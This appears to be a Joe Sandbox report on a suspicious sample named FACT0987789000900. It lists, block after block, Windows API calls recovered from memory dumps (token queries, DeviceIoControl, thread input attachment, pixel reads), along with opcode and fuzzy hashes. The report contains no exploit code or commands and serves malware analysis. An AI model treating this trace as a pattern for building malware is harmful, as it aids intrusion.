                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 614378929-0
                                                                                                                • Opcode ID: df9bb6a856efbdf4e476f720487bfa2f852e866686617f39b1a995ca2bb49528
                                                                                                                • Instruction ID: 5c99d36ba81868788efe3ae9cad9fe98d817277d358cd6c96f68894cabc5aa93
                                                                                                                • Opcode Fuzzy Hash: df9bb6a856efbdf4e476f720487bfa2f852e866686617f39b1a995ca2bb49528
                                                                                                                • Instruction Fuzzy Hash: 3011EE365042159FDB713F71AC04B9A3FB4AF50365F10842FF80596155DB7CC940A6A9
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004D05AC
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004D05C7
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004D05DD
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 004D0632
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                • String ID:
                                                                                                                • API String ID: 3137044355-0
                                                                                                                • Opcode ID: 08b1c7cf9f6d830e8c975dac06bbbc5691e1a9d015f2b0f0bcf769c63293bfcb
                                                                                                                • Instruction ID: 3b97e7342560f7150824bea69064ababdc16e5616025e76b964056a4b169bd19
                                                                                                                • Opcode Fuzzy Hash: 08b1c7cf9f6d830e8c975dac06bbbc5691e1a9d015f2b0f0bcf769c63293bfcb
                                                                                                                • Instruction Fuzzy Hash: F2219071900208EBDB20CF91DCA8BDABBB8EF40704F00846BE91697210D778EA55DF65
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004D6733
                                                                                                                • _memset.LIBCMT ref: 004D6754
                                                                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004D67A6
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004D67AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1157408455-0
                                                                                                                • Opcode ID: a115dcbed2738670232f18b84d89a1718bb6307757f2764ff0e345c1b2b5036d
                                                                                                                • Instruction ID: 4f8fd5fe879ddfe4baa6733e9ed004c1e3a961b400365a89f1e0b266879f22b4
                                                                                                                • Opcode Fuzzy Hash: a115dcbed2738670232f18b84d89a1718bb6307757f2764ff0e345c1b2b5036d
                                                                                                                • Instruction Fuzzy Hash: C311E7759012287AE72057A5AC4DFEBBABCEF44724F11459BF904E72C0D2745E848B78
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004CAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004CAA79
                                                                                                                  • Part of subcall function 004CAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004CAA83
                                                                                                                  • Part of subcall function 004CAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004CAA92
                                                                                                                  • Part of subcall function 004CAA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 004CAA99
                                                                                                                  • Part of subcall function 004CAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004CAAAF
                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,004CADE4,?,?), ref: 004CB21B
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004CB227
                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 004CB22E
                                                                                                                • CopySid.ADVAPI32(?,00000000,?), ref: 004CB247
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                                                                                                                • String ID:
                                                                                                                • API String ID: 259861997-0
                                                                                                                • Opcode ID: 742d56341a3c386f90c7465e84588ce21f683c579c4fcfe23139165c9aaed82d
                                                                                                                • Instruction ID: 033d7cc9d0052332f081930f0636649c24b71ca6270c2bfbd14c6de076ed44df
                                                                                                                • Opcode Fuzzy Hash: 742d56341a3c386f90c7465e84588ce21f683c579c4fcfe23139165c9aaed82d
                                                                                                                • Instruction Fuzzy Hash: 8E119375600209EFCB449F54DC49FAFB7B9EF95308F14805EE54297210D7399E48DB64
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004CB498
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004CB4AA
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004CB4C0
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004CB4DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 0f6c5d1b48bac53ef36a7e2e6a4eccc6fc29b38d795084d881be72d038694f24
                                                                                                                • Instruction ID: c8d7fecd074463d4e96dca28a6fd6677d56a26de2be2f7d44577fb768ffe04a8
                                                                                                                • Opcode Fuzzy Hash: 0f6c5d1b48bac53ef36a7e2e6a4eccc6fc29b38d795084d881be72d038694f24
                                                                                                                • Instruction Fuzzy Hash: ED11367A900218BFDB11DBA9C981F9DBBB4FB08700F204096E604A7290D771AE11DB98
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004D7352
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 004D7385
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004D739B
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004D73A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880819207-0
                                                                                                                • Opcode ID: 385e3f22245aa1f12c6c901b188551d10dfc7b2b6bac6b1399c48e216ff63963
                                                                                                                • Instruction ID: 8b7cdee4b6e48e88d88de3563d4d9b4eeb0f3bc55dfe03115e6ae870c8c431f1
                                                                                                                • Opcode Fuzzy Hash: 385e3f22245aa1f12c6c901b188551d10dfc7b2b6bac6b1399c48e216ff63963
                                                                                                                • Instruction Fuzzy Hash: 0E11E176A04214ABC7019BA8DC06ADE7BA99B54351F144217FC25D33A1E6748D08A7B5
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004AD1BA
                                                                                                                • GetStockObject.GDI32(00000011), ref: 004AD1CE
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 004AD1D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3970641297-0
                                                                                                                • Opcode ID: a51d28b524084054bec6bdf4b4f440f1d7b8dd006c4ab6c3e73c913026123e05
                                                                                                                • Instruction ID: 1e8a56c3991bcf985e2d2dbd511060dba01aa680ca23d01f837aee57c0f55d70
                                                                                                                • Opcode Fuzzy Hash: a51d28b524084054bec6bdf4b4f440f1d7b8dd006c4ab6c3e73c913026123e05
                                                                                                                • Instruction Fuzzy Hash: 9E11C072901609BFEF024FA0DC55EEBBB69FF2A364F044102FA0652150CB35DD60EBA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                • Instruction ID: 83401ae88c640ef617c140edb8bcb1994a0494af0309d0039679fea80c231c0e
                                                                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                • Instruction Fuzzy Hash: 0401833A00014EBBCF525E84DD11DEE3F23BB58354B45841AFE1859131C33ADAB2AB89
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004B7A0D: __getptd_noexit.LIBCMT ref: 004B7A0E
                                                                                                                • __lock.LIBCMT ref: 004B748F
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004B74AC
                                                                                                                • _free.LIBCMT ref: 004B74BF
                                                                                                                • InterlockedIncrement.KERNEL32(01325528), ref: 004B74D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2704283638-0
                                                                                                                • Opcode ID: 21f5822eebbd2310fd8aea56a913da5e610857a699b874563299d516339c0d3a
                                                                                                                • Instruction ID: d19504a0e0031ac1723ff9a319eb70c4495b733ed2f240cc6f2c852b67ebba73
                                                                                                                • Opcode Fuzzy Hash: 21f5822eebbd2310fd8aea56a913da5e610857a699b874563299d516339c0d3a
                                                                                                                • Instruction Fuzzy Hash: 7E01E131909620ABD712AF2594097DEBF70BB8571AF15400BF814A7790C72C5900EFFA
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 004B7AD8
                                                                                                                  • Part of subcall function 004B7CF4: __mtinitlocknum.LIBCMT ref: 004B7D06
                                                                                                                  • Part of subcall function 004B7CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 004B7D1F
                                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004B7AE5
                                                                                                                • __lock.LIBCMT ref: 004B7AF9
                                                                                                                • ___addlocaleref.LIBCMT ref: 004B7B17
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1687444384-0
                                                                                                                • Opcode ID: 88706832ad0611034822b9f6b922b39ff79aff0bec39a0422245dfd2e6c4d087
                                                                                                                • Instruction ID: a4196b9091836b66c8901604d8a49730494d2a1c0cdb2cbf1a808e63d37701db
                                                                                                                • Opcode Fuzzy Hash: 88706832ad0611034822b9f6b922b39ff79aff0bec39a0422245dfd2e6c4d087
                                                                                                                • Instruction Fuzzy Hash: 320161714447009FD720DF76D90578ABBF0EF54329F20890EA496976A0CB78A644CF25
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004AAFE3
                                                                                                                  • Part of subcall function 004AAF83: SelectObject.GDI32(?,00000000), ref: 004AAFF2
                                                                                                                  • Part of subcall function 004AAF83: BeginPath.GDI32(?), ref: 004AB009
                                                                                                                  • Part of subcall function 004AAF83: SelectObject.GDI32(?,00000000), ref: 004AB033
                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004FEA8E
                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 004FEA9B
                                                                                                                • EndPath.GDI32(00000000), ref: 004FEAAB
                                                                                                                • StrokePath.GDI32(00000000), ref: 004FEAB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 1539411459-0
                                                                                                                • Opcode ID: 3e4b9b851623dc07c90518a93bcfa2e8f63d520a957078e53b57f20d7c433d62
                                                                                                                • Instruction ID: 6bbab04dd4000d87b1b0083d0977048fdba21e1788dd1a82bf7e75570da43d3e
                                                                                                                • Opcode Fuzzy Hash: 3e4b9b851623dc07c90518a93bcfa2e8f63d520a957078e53b57f20d7c433d62
                                                                                                                • Instruction Fuzzy Hash: 42F0B431001658BBDB125F94AC0DFCA3F256F2A311F048202FA01600E1C3785665EBAD
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004CC84A
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 004CC85D
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004CC864
                                                                                                                • AttachThreadInput.USER32(00000000), ref: 004CC86B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2710830443-0
                                                                                                                • Opcode ID: dbb809c5837d42747a3f8b195630dd20215ba4b36df4cfefbc062f41b5d3e519
                                                                                                                • Instruction ID: e064ace109218f4a666c782987a1432ee1db315fe622ea1b7c0568794cb45840
                                                                                                                • Opcode Fuzzy Hash: dbb809c5837d42747a3f8b195630dd20215ba4b36df4cfefbc062f41b5d3e519
                                                                                                                • Instruction Fuzzy Hash: 02E0307514122476EB102B629C4DFDB7F6CEF157A1F408015F50D84450C7758985D7F0
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 004CB0D6
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,004CAC9D), ref: 004CB0DD
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004CAC9D), ref: 004CB0EA
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,004CAC9D), ref: 004CB0F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                • Opcode ID: f903dc096906b4660c12af15a78c22c6a511dcc685c4409b862bf3097df09570
                                                                                                                • Instruction ID: 32cabc761663300b7fd79ca62f9027337165d1214f78760d28b4b851a00bb3ad
                                                                                                                • Opcode Fuzzy Hash: f903dc096906b4660c12af15a78c22c6a511dcc685c4409b862bf3097df09570
                                                                                                                • Instruction Fuzzy Hash: 99E08636601221ABD7605FB25C0DFDB3BB8EF65791F01C818F641D6040EB388409D770
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 004AB496
                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 004AB4A0
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004AB4B5
                                                                                                                • GetStockObject.GDI32(00000005), ref: 004AB4BD
                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 0050DE2B
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0050DE38
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0050DE51
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0050DE6A
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0050DE8A
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0050DE95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1946975507-0
                                                                                                                • Opcode ID: 08e0cb817349079da591276f30419e5ce98528c5ad0c6385f7999772a0fc35c8
                                                                                                                • Instruction ID: a7dd8bc743f20c9d25e022b38382669a4e38f73df867f912984d3737d8f6cf6b
                                                                                                                • Opcode Fuzzy Hash: 08e0cb817349079da591276f30419e5ce98528c5ad0c6385f7999772a0fc35c8
                                                                                                                • Instruction Fuzzy Hash: 23E0ED31140240BADB216FB8EC09BD93F21AB66335F14C666F669580E2C7754985EB21
                                                                                                                APIs
                                                                                                                Memory Dump Source
